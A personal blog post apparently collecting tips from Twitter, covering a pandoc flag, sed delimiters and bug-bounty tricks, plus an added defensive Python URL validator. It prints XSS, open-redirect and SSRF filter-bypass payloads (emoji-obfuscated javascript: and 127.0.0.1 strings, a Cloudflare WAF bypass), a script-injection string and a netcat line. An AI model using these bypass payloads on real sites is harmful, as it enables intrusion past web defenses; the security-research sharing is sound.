mikebell.xyz


If you need a Computer Science tutor, code reviewer, or someone to pair program with, click here


June 5, 2019

I don’t know what the title of this one is yet.

This format will be more like my “mind dump”-type posts.

TIL pandoc has a --ascii flag. This fixes the conversion of single quotes to Unicode apostrophes.


I have a lot of Twitter backlog to harvest:

You can bypass xss & open redirect or ssrf protections with emojis
Ex:
javas♥️c😂ript:prompt`1`
ht🕸️tp://12🎀7.0.0.1
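
A defender's view of the two strings in the tweet above, as an added example that is not part of the original post or tweet: a filter that checks the raw string and only afterwards drops non-ASCII characters approves both, while a validator that rejects instead of repairing does not. The check-then-strip order in `naive_filter` is an assumption made for illustration, and the function names are hypothetical.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# The two strings quoted in the tweet above.
SAMPLES = ["javas♥️c😂ript:prompt`1`", "ht🕸️tp://12🎀7.0.0.1"]

def naive_filter(raw):
    """Assumed weak pattern: blocklist check first, clean-up afterwards."""
    lowered = raw.lower()
    if lowered.startswith("javascript:") or "127.0.0.1" in lowered:
        return None
    # Dropping non-ASCII AFTER the check changes what was validated.
    return raw.encode("ascii", "ignore").decode()

def strict_check(raw):
    """Return (ok, reason). Reject instead of repairing the input."""
    if any(not 0x21 <= ord(ch) <= 0x7E for ch in raw):
        return False, "non-ascii or control character"
    try:
        parts = urlsplit(raw)
    except ValueError:
        return False, "unparseable url"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not parts.hostname:
        return False, "missing host"
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        # A DNS name: the caller still has to check the resolved address.
        return True, "ok (hostname)"
    if ip.is_loopback or ip.is_private or ip.is_link_local:
        return False, "internal address"
    return True, "ok"

if __name__ == "__main__":
    for s in SAMPLES:
        print(repr(naive_filter(s)), strict_check(s))
```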

#writeup Google bug bounty: LFI on production servers in springboard.google.com – $13,337 USD

Short story about why you must always check for dirs in 302 status pages,
because you will be surprised that some directory listings will work

https://omespino.com/write-up-google-bug-bounty-lfi-on-production-servers-in-redacted-google-com-13337-usd/

#Bugbounty #infosec

Cloudflare WAF events Bypass:  if ><tag onxxxx=alert(1)> is filtered, 
try ><tag onxxxx=a;alert(1)> and you're done #bugbounty #infosec

sed(1) can use delimiters other than slash. Especially useful when you 
want to match a url, like:

sed -i 's#http://example.local/foo##' urls.txt

What if researchers hit vulnerable open services online with spoilers? 
Or used them in PoCs for exploits when submitting bug bounties?

echo -e "\033[0;31mSnape kills Dumbledore" | nc -nv ...

"><script>confirm("Thanos Marries Tony Stark");</script><!--
